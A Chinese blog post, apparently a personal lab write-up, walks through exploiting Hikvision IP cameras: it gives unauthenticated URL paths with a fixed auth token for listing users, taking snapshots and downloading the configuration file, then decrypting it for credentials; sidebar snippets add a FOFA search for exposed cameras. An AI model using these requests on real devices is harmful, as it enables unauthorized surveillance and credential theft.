记录一次Hikvision手日

最新推荐文章于 2024-04-07 09:53:33 发布
最新推荐文章于 2024-04-07 09:53:33 发布
阅读量3.3k 收藏 6
点赞数 1
分类专栏: Penetration 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/122322541
版权

1NDEX

0x00 前言

考试周太Boring了
本来局域网搭个靶场打打
然后扫到了几个摄像头,比较简单,就试试看

本文基本参考freebuf文章编写!!!

贴上参考师傅文章

https://www.freebuf.com/vuls/278336.html

在这里插入图片描述
在这里插入图片描述

0x01 开日

漏洞探测

探测用户列表

/Security/users?auth=YWRtaW46MTEK

在这里插入图片描述

读取快照

onvif-http/snapshot?auth=YWRtaW46MTEK

在这里插入图片描述

下载摄像头配置文件

/System/configurationFile?auth=YWRtaW46MTEK

在这里插入图片描述

配置文件的解密

hikvision的配置文件是加密的。解密工具网上很多要么收费的,要么不靠谱的
git上有好用的
https://github.com/WormChickenWizard/hikvision-decrypter
在这里插入图片描述

读取解密后的配置文件

需要用到wxmedit
下载地址:
https://wxmedit.github.io/zh_CN/downloads.html
根据你一开始读到的用户进行查找
在这里插入图片描述
done
记得登陆后用IE看!

再强调一下 本文参照freebuf上师傅的文章编写!!!
只是拿师傅的方法实操了一下

https://www.freebuf.com/vuls/278336.html

0x02 rethink

伪RT的快乐日常?
脚本小子罢了

k_du1t
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
海康威视解码专用工具器
06-21
HIKVISION海康威视解码专用工具器
HIKVISION开发文档之一
08-23
HIKVISION海康威视ISAPI开发图像手册V2.5
海康威视(Hikvision) 摄像头-CVE-2017-7921漏洞复现
m0_49025459的博客
07-04 4880
许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
解析HikvisionDecode:一款强大的海康摄像头视频解码工具
最新发布
gitblog_00039的博客
04-07 678
解析HikvisionDecode:一款强大的海康摄像头视频解码工具 项目地址:https://gitcode.com/baogod404/HikvisionDecode 项目简介 HikvisionDecode 是一个开源项目,专为解析和处理海康威视(Hikvision)摄像头的录像文件而设计。它基于Python编写,允许用户轻松地提取、播放和导出这些监控设备生成的加密视频数据。对于需要进行视频...
海康威视越权访问CVE-2021-7921漏洞复现
归零者的博客
10-31 4117
海康威视越权访问CVE-2021-7921漏洞复现
Hikvision海康威视数据库账号解密工具
潇湘信安的博客
09-17 971
这个工具可以用来解密Hikvision海康威视加密的数据库账号和密码,适用版本:海康威视ivms-8700
【未授权访问】我就这么容易被曝光了吗?
热门推荐
kimol君的博客
08-06 2万+
【未授权访问】我怎么被监控了?前言一、洞穿一切1.获取用户名2.下载摄像头配置文件3.获取监控快照二、Fofa无边三、双管齐下1.爬取设备信息2.自动化检测写在最后 前言 时光转瞬,上一篇文章的时间定格在了半年前的情人节。由于各种原因,已经好久没有更新文章了,承蒙大家的喜爱,陆续收到了许多小伙伴的“催更”。有一说一:“心里是暖的❤️”。 愿今后自己可以不忘初心,继续前行,将心中的一些想法,一些感受,一些技巧,一些故事与大家分享。 恰巧前不久看到某康威视网络摄像头存在漏洞,于是,作为对万物充满好奇的少年,
HIKVISION的SDK二次BCB开发
08-15
在本文中,我们将深入探讨HIKVISION的SDK在Borland C++ Builder(BCB)环境下的二次开发过程。HIKVISION是全球知名的安防设备制造商,其提供的SDK为开发者提供了丰富的功能,允许用户自定义开发基于HIKVISION工业...
HIKVISION的Delphi二次开发实例
08-15
本主题聚焦于HIKVISION的gigE(千兆以太网)工业相机的Delphi(一种强大的面向对象的编程语言)二次开发实例。这个实例是HIKVISION官方提供的,旨在帮助开发者更好地理解和应用其相机硬件与软件接口。 首先,gigE...
hikvision.zip
07-01
海康威视摄像头sdk二次开发布防报警回调,maven工程,导入即用(examples的jar包需要maven打入本地库或者单独引用依赖)
CKF-UKF-EKF.zip_CKF_CKF滤波_ekf、ukf、ckf_卡尔曼 对比_卡尔曼对比
07-15
CKF、EKF、UKF的对比程序,CKF作为09年新出的卡尔曼滤波器,有着严格的数据理论依据。
aes-decrypter
05-28
AES解密器 安装 npm install --save aes-decrypter 也可以全局安装: npm install --global aes-decrypter 首选npm安装,但是Bower也可以。 bower install --save aes-decrypter 用法 要将解密程序包含在您的网站或npm应用程序中,请使用以下任何一种方法。 var Decrypter = require ( 'aes-decrypter' ) . Decrypter ; var fs = require ( 'fs' ) ; var keyContent = fs . readFileSync ( 'something.key' ) ; var encryptedBytes = fs . readFileSync ( 'somithing.txt' ) ; // keyCo
hikvision-onvif2.4.7z
05-30
hikvision-onvif2.4.7z 海康 onvif接口说明文档,刚从官网下载下来。时间 hikvision-onvif2.4.7z
CC2530PSHT11.rar_CC2530 SHt11_cc2530 sht
07-15
CC2530驱动SHT11,试验成功 环境IAR
HikVision20IP20S_Hikvision_源码
10-04
HikVision20IP20Surveillance20API20RaCM20Part20User20Guide.1552796388
HIKVISION CGI IPMD V1.5.9_Hikvision_
09-29
HIKVISION CGI IPMD V1.5.9
海康威视老版本漏洞复现
y_h_p的博客
02-29 837
利用“fofa搜索引擎”搜索body="Hikvision Digital Technology Co"查找摄像头。将ip地址后面得地址改为onvif-http/snapshot?auth=YWRtaW46MTEK,即可成功。如:http://ip地址/onvif-http/snapshot?在搜索到得摄像头中找到一个老版本。成功进入,即可获取监控快照。
hikvision开发文档
06-24
### 回答1: Hikvision开发文档是一个面向开发者和工程师的技术指南,为用户提供使用Hikvision产品和相关技术的解决方案。它包含各种编程指南、接口说明和系统架构的详细介绍,为用户提供了使用Hikvision产品的更多方法。 Hikvision开发文档的内容包括camera、DVR等核心产品的API文档、视频压缩和编码规范、音频采集、网络通信和网络视频等方面的技术文档。此外,该文档还提供了Hikvision产品的软件开发工具和配套开发环境,包括SDK、扩展库和示例代码,帮助开发人员获得更快的开发速度和更高质量的代码效率。 同时,Hikvision开发文档还提供了一些最佳实践、技术方案和案例分析,为用户提供了使用Hikvision产品的最佳方法和技巧。它也推进了更好的生态系统,帮助用户搭建基于Hikvision技术的解决方案。 总之,Hikvision开发文档为Hikvision产品的使用者和开发者提供了一个完整的解决方案,帮助他们更好地理解和使用产品。 ### 回答2: Hikvision开发文档是为开发人员提供的一个重要参考资源。该文档包含了大量有关Hikvision产品API的信息,旨在帮助开发人员利用Hikvision产品的功能进行软件开发。具体而言,Hikvision开发文档包含了如下内容: 1. API文档:API文档包括了Hikvision各类产品的API接口,主要涵盖视频、音频、网络、存储、设备管理等方面。其中每个接口都附有详细的参数说明、返回值以及使用示例,可供开发人员参考。 2. SDK文档:SDK文档是Hikvision为开发人员提供的软件开发包,主要包括Hikvision各类产品的SDK开发文档。该文档涵盖了SDK的使用方法、开发环境搭建、API接口参考等内容,可帮助开发人员更便捷地进行软件开发。 3. 接入指南:接入指南主要是针对新手开发人员制定的,提供了一些基础知识的介绍、开发环境搭建、Hikvision产品接入的步骤、常见问题等内容,旨在帮助开发人员快速入门、提高开发效率。 总之,Hikvision开发文档是Hikvision为开发人员提供的极其重要的资源,其详尽的API文档、SDK开发文档和接入指南都能帮助开发人员更高效地利用Hikvision产品进行软件开发,从而实现更多的功能和应用。 ### 回答3: Hikvision开发文档是一种技术文档,旨在为开发人员提供相关的API和SDK,并详细介绍如何使用和集成这些工具来开发与海康威视监控摄像机、录像机、视频智能分析等产品相关的软件应用。开发文档在为开发者提供开发环境和开发技术方面提供了方便,并详细介绍了如何在自己的应用中使用Hikvision提供的技术工具和API接口。在文档中,开发者可以找到安装和使用SDK的详细步骤,可以了解到API功能和用法,以及如何在各种编程语言中使用这些功能。 与海康威视监控产品的其他文档一样,Hikvision开发文档非常详细和全面,帮助开发人员轻松入手Hikvision开发工作并实现各种功能。文档中提供的示例代码和说明,可以帮助开发人员更好地理解和应用相关的技术,同时也能提升自身的开发水平。此外,文档还提供了专业的技术支持,当开发者遇到问题时,Hikvision的技术服务支持人员可以提供及时的帮助和解决方案。 总之,Hikvision开发文档是Hikvision监控产品开发的一个重要组成部分,为开发人员提供了充足的技术资源和工具,以便快速开发和实现各种应用。它帮助开发人员了解和使用Hikvision技术,提升其开发能力和技术水平,为Hikvision监控产品的应用和普及做出了重要贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值